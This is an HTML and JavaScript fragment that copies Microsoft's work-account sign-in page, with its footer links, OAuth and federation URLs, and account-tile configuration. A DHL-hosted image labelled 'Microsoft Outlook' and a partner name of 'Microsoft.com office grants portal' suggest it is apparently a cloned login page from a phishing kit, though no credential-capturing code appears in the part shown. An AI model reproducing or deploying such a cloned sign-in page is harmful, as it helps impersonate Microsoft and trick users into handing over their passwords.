<img src="https://www.dhlexpress.be/wp-content/uploads/2017/04/Scannen-767x509.jpg" alt="Microsoft Outlook" align="left" title="" border="0" height="100" width="170"/>
                        </div>
                            <span class="footer_link text-caption" id="footer_copyright_link">
                            </span>
                        </div>
                        <div>
                            <span class="footer_link">
                                <a class="text-caption" id="footer_link_terms" href="https://www.microsoft.com/en-US/servicesagreement/" target="_blank">Terms of use</a>
                            </span>
                            <span class="footer_link">
                                <a class="text-caption" id="footer_link_privacy" href="https://privacy.microsoft.com/en-US/privacystatement" target="_blank">Privacy &amp; cookies</a>
                            </span>
                        </div>
                </div>
                    
        </div>
    </div>
</div>
<div id="login_prefetch_container" class="no-display">
</div>
                    </td>
                </tr>
            </table>
        </div>
        

<script type="text/javascript">
    var Constants = Constants || {};
    Constants.MEMBER_NAME = "";

    
    Constants.REDIRECT_MESSAGES =
    {
        'AAD': "We\u0027re taking you to your organization\u0027s sign-in page.",
        'MSA': "We‘re taking you to the Microsoft account sign-in page.",
        'CLOUDFEDERATED': "We\u0027re taking you to your organization\u0027s sign-in page."
    };

    Constants.FEDERATION_QUERY_PARAMETERS = '?mkt=en-US&client-request-id=68f97586-b3eb-4baa-b82b-06c49fc1faeb&username=&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQIIAXXRO2_TUAAF4DgPq0WoVKgSjB2YqOJc2_EjkYrkxDSJEsdJbMe9XqrEuYkfiW2cmyb1xMTcEXVBYkHKCEvFhsSAOnVG_ABEF8QEZSH9ASxn-oajc55maIouPymyRW4gDEv50oBn88USDfKDIsPnWY7lWQbQIw6w8cN7u68Wf5ybD-vm5QH5-c2n25s18cjBOJqXC4XlckmF47FrI8oOZ4VLgrgmiO8EcZHOoSBvaOv0nGf5YokRREBzgsCKPAcoSx557VrPV_UuhvrIaVcBaMtdrmU2aMtUcLumJJY8AarZZdUaZKBecaHnJxuz8VNf1QCAiTNt6dOZwjSwMrP8ti5tfOOszRjLr-kHqrTADnMXYewm6Fd6exzGs5MonOOLzDtCjVDQGFXDIEA2pu4YCrBrD7AbBp04jFCMXTQ_9JvHQUeHsZ0g2eifeUDsreq6cAI7sG4sA1E3h6s-25zrE59OOFGwm3Qkccg2ZMHQLKgaR1IMFjg6EmA-BklX0Tqqhkqz0oJu6hUpaHiiA3rMQtT8oVYp1jRbl0zL7D-3TS6Qj-33GXIz6ywMrjI7m1KBO9qP4nDsTtF1lviRvQ8y5a0tcpd4nNpP_c4Sb3Obt758e9293fvbeilT7LOdvdRVruAja6W-6DleAfbdydCTa2z_tCrV6vG0WTDGCtSU0ypeegcteMiX6XOSOCfJn2Tq4_b_jv4H0'.substr(1);
    Constants.CONTEXT = 'rQIIAXXRO2_TUAAF4DgPq0WoVKgSjB2YqOJc2_EjkYrkxDSJEsdJbMe9XqrEuYkfiW2cmyb1xMTcEXVBYkHKCEvFhsSAOnVG_ABEF8QEZSH9ASxn-oajc55maIouPymyRW4gDEv50oBn88USDfKDIsPnWY7lWQbQIw6w8cN7u68Wf5ybD-vm5QH5-c2n25s18cjBOJqXC4XlckmF47FrI8oOZ4VLgrgmiO8EcZHOoSBvaOv0nGf5YokRREBzgsCKPAcoSx557VrPV_UuhvrIaVcBaMtdrmU2aMtUcLumJJY8AarZZdUaZKBecaHnJxuz8VNf1QCAiTNt6dOZwjSwMrP8ti5tfOOszRjLr-kHqrTADnMXYewm6Fd6exzGs5MonOOLzDtCjVDQGFXDIEA2pu4YCrBrD7AbBp04jFCMXTQ_9JvHQUeHsZ0g2eifeUDsreq6cAI7sG4sA1E3h6s-25zrE59OOFGwm3Qkccg2ZMHQLKgaR1IMFjg6EmA-BklX0Tqqhkqz0oJu6hUpaHiiA3rMQtT8oVYp1jRbl0zL7D-3TS6Qj-33GXIz6ywMrjI7m1KBO9qP4nDsTtF1lviRvQ8y5a0tcpd4nNpP_c4Sb3Obt758e9293fvbeilT7LOdvdRVruAja6W-6DleAfbdydCTa2z_tCrV6vG0WTDGCtSU0ypeegcteMiX6XOSOCfJn2Tq4_b_jv4H0';
    Constants.BASE_URL = '/common/reprocess?';
    Constants.LATENCY_THRESHOLD = 2000;

    Constants.CDN_IMAGE_PATH = 'https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/images/';
    Constants.PREFETCH_URL = "https://www.office.com/prefetch/prefetch";
    Constants.IS_USE_OTHER_ACCOUNT_VISIBLE = true;
    Constants.OTHER_ACCOUNT_TEXT = "Use another account";
    Constants.MAX_USER_TILES = 5;

    Constants.PARTNER_NAME = "Microsoft.com office grants portal";
    Constants.DIR = 'ltr';
    Constants.METRICS_MODE = 1;  // Client metrics mode.

    if (Constants.TokenizedStringMsgs)
    {
        
        Constants.TokenizedStringMsgs.GENERIC_ERROR = "\u003cH1\u003eSorry, but we\u0027re having trouble signing you in\u003c/H1\u003e\u003cp\u003ePlease try again in a few minutes. If this doesn\u0027t work, you might want to contact your admin and report the following error: #~#ErrorCode#~#.\u003c/p\u003e";
        Constants.TokenizedStringMsgs.UPN_DISAMBIGUATE_MESSAGE = "It looks like {0} is used with more than one account. Which account do you want to use?";
    }

    
    Constants.FLOW_TOKEN = '';
    Constants.FLOW_TOKEN_COOKIE_NAME = 'ESTSWCTXFLOWTOKEN';
    Constants.LCID = "1033";
    Constants.MSA_ACCOUNT_IMG_ALT_TEXT = "Microsoft account symbol";
    Constants.AAD_ACCOUNT_IMG_ALT_TEXT = "Work or school account symbol";
    Constants.MSA_ACCOUNT_TILE_ALT_TEXT = "Microsoft account for {0}";
    Constants.AAD_ACCOUNT_TILE_ALT_TEXT = "Work or school account for {0}";
    Constants.REALM_RESOLVER_URL = "/common/userrealm";
    Constants.FORCED_SIGN_IN = false;
    Constants.MSA_AUTH_URL = 'https://login.live.com/oauth20_authorize.srf?response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&scope=openid+profile+email+offline_access&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&state=rQIIAXWRO2_TUACFc5PWahAqFapUxg5MVEmu7fiRSEVyYppGieMktuNeL1Xi3NSPxDbOTdN6YmLuiLIgsSBlhKViQ2JAnTojfgCiC2KCspCys5zlfMPR-Z5k6Dxdflxki1xfGJRypT7P5oolGub6RYbPsRzLswykhxxk44f3tl7Ofjs375eNyz3q0-uPtzcLkD0eu6c4b4eTJdhxCImm5UJhPp_nw9HItf8VhUsArgH4BsAivY6DnKEt01Oe5YslRhAhzQkCK_IczFvy0GvVur6qdwjSh06rCmFL7nBNs05bpkJaNSWx5BOomh1WrSEG6RUXeX6yYlb82Fc1CFHijJv6eKIwdaJMLL-lSyu-ft5ijPmX9ANVmhGHuYswdhP8M50dhfHkOAqnZJF5C9QIB_VhNQwCbJP8HYYD4tp94oZBOw4jHBMXT_f9xlHQ1lFsJ1g2euceFLtnh7pwjNro0JgHom4OznpsY6qf-HTCiYLdoCOJw7YhC4ZmIdU4kGI4I9GBgHIxTDqK1lY1XJqUZnRDr0hB3RMd2GVmouYPtEqxptm6ZFpm75ltcoF8ZL_LUKtbJ2FwldlcjQrc4W4UhyN3jK_XwPe1-zBT3tigtsCj1G7q1xp4s74y9_nrq87t9p_mCznPPt3cTl2tF3xsnanPu45XQD33ZODJNbZ3WpVqh_G4UTBGCtKU0yqZe3tNtM-X6QsKXFDUDyr1Ifs_0X8B0&estsfed=1&uaid=68f97586b3eb4baab82b06c49fc1faeb&mkt=en-US';
    Constants.IS_CXH_REQUEST = false;
    Constants.IS_ADAL_REQUEST = false;
    Constants.IS_NAME_COEXISTENCE_ACCOUNT = false;

    Constants.ADAL_UX_OVERRIDE = false;
    Constants.CANCEL_REDIRECT_URL = 'https://www.office.com/';
    Constants.IS_MSA_FED_SUPPORTED = true;
    Constants.IS_MSA_PHONE_USERNAME_SUPPORTED = true;
    Constants.IS_MSA_REDIR_SUPPORTED = false;
    Constants.MSA_DOMAIN = 'live.com';
    Constants.PROMPT = '';
    Constants.CLICKFORMORE = "Click for more actions";
    Constants.CONNECTEDTOWINDOWS = "Connected to Windows";
    Constants.SIGNEDIN = "Signed in";
    Constants.CLICKTOSIGNIN = "";
    Constants.SIGNINGOUT = "Signing out...";
    Constants.USERNAME_HINT_TEXT = 'Email or phone';
    Constants.IS_LOGOUT_REQUEST = false;
    Constants.SHOULD_HIDE_SIGNUP = false;
    Constants.USE_DARK_TILE_LOGO = false;
    Constants.HAS_ERROR = false;
    Constants.IS_MOBILE = false;
    Constants.uxLogoutUrl = "https://login.microsoftonline.com/common/uxlogout";
    Constants.forgetUrl = "https://login.microsoftonline.com/forgetuser";
    Constants.IS_HOLOGRAPHIC = false;
    Constants.Header_Text_Username = 'Sign in with your work account';
    Constants.Header_Text_Password = 'Enter your password';
    Constants.Header_Text_Privacy = 'Privacy statement';
    Constants.Use_Client_Check_Msa_Flag = true;
    Constants.DisambigHelpUrl = "https://go.microsoft.com/fwlink/p/?LinkID=733247";
    Constants.CxhFlow = "";
    Constants.isChinaDC = false;
    Constants.Locale = "en-US";
    Constants.IsB2CScenario = false;
    Constants.appRedirectUrl = 'https://login.live.com/oauth20_authorize.srf?response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&scope=openid+profile+email+offline_access&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&state=rQIIAXWRO2_TUACFc5PWahAqFapUxg5MVEmu7fiRSEVyYppGieMktuNeL1Xi3NSPxDbOTdN6YmLuiLIgsSBlhKViQ2JAnTojfgCiC2KCspCys5zlfMPR-Z5k6Dxdflxki1xfGJRypT7P5oolGub6RYbPsRzLswykhxxk44f3tl7Ofjs375eNyz3q0-uPtzcLkD0eu6c4b4eTJdhxCImm5UJhPp_nw9HItf8VhUsArgH4BsAivY6DnKEt01Oe5YslRhAhzQkCK_IczFvy0GvVur6qdwjSh06rCmFL7nBNs05bpkJaNSWx5BOomh1WrSEG6RUXeX6yYlb82Fc1CFHijJv6eKIwdaJMLL-lSyu-ft5ijPmX9ANVmhGHuYswdhP8M50dhfHkOAqnZJF5C9QIB_VhNQwCbJP8HYYD4tp94oZBOw4jHBMXT_f9xlHQ1lFsJ1g2euceFLtnh7pwjNro0JgHom4OznpsY6qf-HTCiYLdoCOJw7YhC4ZmIdU4kGI4I9GBgHIxTDqK1lY1XJqUZnRDr0hB3RMd2GVmouYPtEqxptm6ZFpm75ltcoF8ZL_LUKtbJ2FwldlcjQrc4W4UhyN3jK_XwPe1-zBT3tigtsCj1G7q1xp4s74y9_nrq87t9p_mCznPPt3cTl2tF3xsnanPu45XQD33ZODJNbZ3WpVqh_G4UTBGCtKU0yqZe3tNtM-X6QsKXFDUDyr1Ifs_0X8B0&estsfed=1&uaid=68f97586b3eb4baab82b06c49fc1faeb&mkt=en-US';
    Constants.msaSignupUrl = 'https://login.live.com/oauth20_authorize.srf?response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&scope=openid+profile+email+offline_access&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&state=rQIIAXWRO2_TUACFc5PWahAqFapUxg5MVEmu7fiRSEVyYppGieMktuNeL1Xi3NSPxDbOTdN6YmLuiLIgsSBlhKViQ2JAnTojfgCiC2KCspCys5zlfMPR-Z5k6Dxdflxki1xfGJRypT7P5oolGub6RYbPsRzLswykhxxk44f3tl7Ofjs375eNyz3q0-uPtzcLkD0eu6c4b4eTJdhxCImm5UJhPp_nw9HItf8VhUsArgH4BsAivY6DnKEt01Oe5YslRhAhzQkCK_IczFvy0GvVur6qdwjSh06rCmFL7nBNs05bpkJaNSWx5BOomh1WrSEG6RUXeX6yYlb82Fc1CFHijJv6eKIwdaJMLL-lSyu-ft5ijPmX9ANVmhGHuYswdhP8M50dhfHkOAqnZJF5C9QIB_VhNQwCbJP8HYYD4tp94oZBOw4jHBMXT_f9xlHQ1lFsJ1g2euceFLtnh7pwjNro0JgHom4OznpsY6qf-HTCiYLdoCOJw7YhC4ZmIdU4kGI4I9GBgHIxTDqK1lY1XJqUZnRDr0hB3RMd2GVmouYPtEqxptm6ZFpm75ltcoF8ZL_LUKtbJ2FwldlcjQrc4W4UhyN3jK_XwPe1-zBT3tigtsCj1G7q1xp4s74y9_nrq87t9p_mCznPPt3cTl2tF3xsnanPu45XQD33ZODJNbZ3WpVqh_G4UTBGCtKU0yqZe3tNtM-X6QsKXFDUDyr1Ifs_0X8B0&estsfed=1&uaid=68f97586b3eb4baab82b06c49fc1faeb&signup=1&lw=1&fl=easi2&mkt=en-US';
    Constants.footerTermsUrl = 'https://www.microsoft.com/en-US/servicesagreement/';
    Constants.footerPrivacyUrl = 'https://privacy.microsoft.com/en-US/privacystatement';
    Constants.uxPreviewOptInUrl = 'https://login.microsoftonline.com/common/uxpreview/optin';
    Constants.refreshUrl = 'https://login.microsoftonline.com/common/reprocess?ctx=rQIIAXXRO2_TUAAF4DgPq0WoVKgSjB2YqOJc2_EjkYrkxDSJEsdJbMe9XqrEuYkfiW2cmyb1xMTcEXVBYkHKCEvFhsSAOnVG_ABEF8QEZSH9ASxn-oajc55maIouPymyRW4gDEv50oBn88USDfKDIsPnWY7lWQbQIw6w8cN7u68Wf5ybD-vm5QH5-c2n25s18cjBOJqXC4XlckmF47FrI8oOZ4VLgrgmiO8EcZHOoSBvaOv0nGf5YokRREBzgsCKPAcoSx557VrPV_UuhvrIaVcBaMtdrmU2aMtUcLumJJY8AarZZdUaZKBecaHnJxuz8VNf1QCAiTNt6dOZwjSwMrP8ti5tfOOszRjLr-kHqrTADnMXYewm6Fd6exzGs5MonOOLzDtCjVDQGFXDIEA2pu4YCrBrD7AbBp04jFCMXTQ_9JvHQUeHsZ0g2eifeUDsreq6cAI7sG4sA1E3h6s-25zrE59OOFGwm3Qkccg2ZMHQLKgaR1IMFjg6EmA-BklX0Tqqhkqz0oJu6hUpaHiiA3rMQtT8oVYp1jRbl0zL7D-3TS6Qj-33GXIz6ywMrjI7m1KBO9qP4nDsTtF1lviRvQ8y5a0tcpd4nNpP_c4Sb3Obt758e9293fvbeilT7LOdvdRVruAja6W-6DleAfbdydCTa2z_tCrV6vG0WTDGCtSU0ypeegcteMiX6XOSOCfJn2Tq4_b_jv4H0';
    Constants.showOptInBanner = true;


    Constants.SplitterControlData = [
    {
        "name": "Work or school account",
        "login": "Created by your IT department",
        "image": "https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/images/work_account.png",
        "link": 'MSLogin.SplitterControl.LoginAAD',
        "authUrl": '',
        "id": 'aad_account_tile',
        "domainHint": ''
    }, {
        "name": "Personal account",
        "login": "Created by you",
        "image": "https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6999.16/content/images/personal_account.png",
        "link": 'MSLogin.SplitterControl.LoginMSA',
        "authUrl": 'https://login.live.com/oauth20_authorize.srf?response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&scope=openid+profile+email+offline_access&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&state=rQIIAXWRO2_TUACFc5PWahAqFapUxg5MVEmu7fiRSEVyYppGieMktuNeL1Xi3NSPxDbOTdN6YmLuiLIgsSBlhKViQ2JAnTojfgCiC2KCspCys5zlfMPR-Z5k6Dxdflxki1xfGJRypT7P5oolGub6RYbPsRzLswykhxxk44f3tl7Ofjs375eNyz3q0-uPtzcLkD0eu6c4b4eTJdhxCImm5UJhPp_nw9HItf8VhUsArgH4BsAivY6DnKEt01Oe5YslRhAhzQkCK_IczFvy0GvVur6qdwjSh06rCmFL7nBNs05bpkJaNSWx5BOomh1WrSEG6RUXeX6yYlb82Fc1CFHijJv6eKIwdaJMLL-lSyu-ft5ijPmX9ANVmhGHuYswdhP8M50dhfHkOAqnZJF5C9QIB_VhNQwCbJP8HYYD4tp94oZBOw4jHBMXT_f9xlHQ1lFsJ1g2euceFLtnh7pwjNro0JgHom4OznpsY6qf-HTCiYLdoCOJw7YhC4ZmIdU4kGI4I9GBgHIxTDqK1lY1XJqUZnRDr0hB3RMd2GVmouYPtEqxptm6ZFpm75ltcoF8ZL_LUKtbJ2FwldlcjQrc4W4UhyN3jK_XwPe1-zBT3tigtsCj1G7q1xp4s74y9_nrq87t9p_mCznPPt3cTl2tF3xsnanPu45XQD33ZODJNbZ3WpVqh_G4UTBGCtKU0yqZe3tNtM-X6QsKXFDUDyr1Ifs_0X8B0&estsfed=1&uaid=68f97586b3eb4baab82b06c49fc1faeb&mkt=en-US',
        "id": 'mso_account_tile',
        "domainHint": 'msa'
    }];

    
    Constants.responseMode="FormPost";
    
    
    Constants.cancelErrorParams={"error":"access_denied","error_subcode":"cancel","state":"OpenIdConnect.AuthenticationProperties%3dkKXnPTYrczeDUVyj08RxHT7_YPYHUwn8TWbxV3KsTgk1z587cK1pA5ecUD7USZYOUFAr0utpF7Y-r0zQMSPOSe9m9u1KTBAnIj8h0R2u8SkbSB4GScTAWZWVEcW5nDXc","add_account":null};

        Constants.desktopSsoConfig =
        {
            iwaEndpointUrlFormat: "https://autologon.microsoftazuread-sso.com/{0}/winauth/sso?desktopsso=true&isAdalRequest=False",
            iwaRequestTimeoutInMs: -2147483648,
            lastUsernameTried: "",
            startDesktopSsoOnPageLoad: false,
            hintedDomainName: "",
            progressAnimationTimeout: 10000,
            isEdgeAllowed: false,
            isSafariAllowed: true
        };

    Constants.onPremPasswordValidationConfig =
    {
        isUserRealmPrecheckEnabled: true
    }

    

    // Setup cta message fields.
    window.$Do.when("User", 0, function ()
    {
        User.setupCallToActionMessages();
    });

    // Other tile
    var Tiles = Tiles || {};
    Tiles.otherJSON = {
        'name': 'Use another account',
        'login': '',
        'imageAAD': 'other_glyph.png',
        'imageMSA': 'other_glyph.png',
        'isLive': false,
        'link': 'other',
        'authUrl': '',
        'sessionID': '',
        'domainHint': 'other'
    };
</script>
